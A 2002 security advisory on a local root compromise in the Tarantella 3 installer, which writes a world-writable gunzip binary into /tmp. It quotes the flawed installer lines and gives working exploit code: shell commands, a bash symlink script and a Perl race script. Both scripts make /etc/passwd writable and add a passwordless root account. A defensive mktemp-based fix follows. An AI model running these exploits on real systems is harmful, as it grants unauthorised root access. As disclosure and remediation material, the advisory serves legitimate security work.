28th Jan 2002 [SBWID-5035]
COMMAND
Tarantella local root compromise at installation time via bad tmp
practice
SYSTEMS AFFECTED
Tarantella 3
PROBLEM
\"Larry W. Cashdollar\" in \"Vapid Labs\" [http://vapid.dhs.org/]
advisory says :
The installation script provided with Tarantella handles utility
packages during installation insecurely. A root-owned binary "gunzip"
is created in /tmp with world-writable permissions; the pid is
appended to the filename.
TMP_GUNZIP=$TMPDIR/gunzip$$

$ ls -l /tmp/gunzip16152
-rwxrwxrwx 1 root root 51808 Jan 14 00:15 gunzip16152
gunzip is extracted:
extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE
The permissions of gunzip are changed to rwx for all:
chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
extract $efilename | $TMP_GUNZIP -q > "$efilename"
Exploit
=======
There is a race condition between when gunzip is extracted and when it
is used during installation, during which a malicious local user could
inject code to compromise the system quickly.
$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh
$ cat /tmp/test.sh > /tmp/gunzip16152
I was able to change the permissions of /etc/passwd to 777 by
performing the above as an unprivileged user.
In a script:
#!/bin/bash
#Larry W. Cashdollar lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux. run and wait.
echo "Creating symlink."
/bin/ln -s /etc/passwd /tmp/spinning
echo "Waiting for tarantella installation."
while true
do
    echo -n .
    if [ -w /etc/passwd ]
    then
        echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
    fi
done
-Also-
#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar lwc@vapid.dhs.org 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html
use strict;

`cat << -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;

my $OUT = '';
while (!$OUT) {
    $OUT = `ps -ax |grep gunzip |grep -v grep`;
    print "Found $OUT\n";
}
my @args = split(' ', $OUT);

# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while (1) {
    `cp root.sh $args[4]`;
}
SOLUTION
Perhaps create a directory in /tmp or /var/tmp and use that directory
as a work place?
umask 077
mkdir /tmp/workdir
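The private-workdir approach suggested above, worked through as an added example (not code from the advisory or from Tarantella's installer): the function names make_private_workdir, stage_helper and find_world_writable are ours, and the staged file stands in for the installer's extracted gunzip.

```shell
#!/bin/sh
# Added example. Replaces the installer pattern
#   TMP_GUNZIP=$TMPDIR/gunzip$$ ; extract gunzip > "$TMP_GUNZIP" ; chmod 777 $TMP_GUNZIP
# with a private work directory and an owner-only helper binary.
# make_private_workdir, stage_helper and find_world_writable are our own names.

# Create a 0700 directory with an unpredictable name under ${TMPDIR:-/tmp}.
# mktemp -d creates it atomically, so a local user cannot pre-create the path
# (or plant a symlink there) the way a predictable /tmp/gunzip$$ name allows.
make_private_workdir() {
    dir=$(umask 077; mktemp -d "${TMPDIR:-/tmp}/tarantella-install.XXXXXX") || return 1
    # Refuse the directory unless we own it and it is exactly mode 0700
    # (guards against a hostile TMPDIR or a mktemp that ignored the umask).
    [ -n "$(find "$dir" -prune -type d -user "$(id -u)" -perm 700 -print)" ] || return 1
    printf '%s\n' "$dir"
}

# Stage a helper (the installer's embedded gunzip) into the private workdir.
# $1 = file holding the extracted binary; $2 = directory from make_private_workdir.
# Written under umask 077, so it is never world-writable, not even briefly.
stage_helper() {
    helper="$2/gunzip"
    ( umask 077; cat "$1" > "$helper" ) || return 1
    chmod 700 "$helper" || return 1
    # Before it is executed, confirm it is still a plain file we own, with a
    # single link and no group/other bits, i.e. nothing was swapped in.
    [ -n "$(find "$helper" -prune -type f -links 1 -user "$(id -u)" -perm 700 -print)" ] || return 1
    printf '%s\n' "$helper"
}

# Detection side: list world-writable regular files under a directory, the
# symptom visible in the advisory's `ls -l /tmp/gunzip16152` output.
find_world_writable() {
    find "$1" -type f -perm -002 -print
}
```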
Update (05 April 2002)
======
Tarantella addressed these issues in a security bulletin:
http://www.tarantella.com/security/bulletin-04.html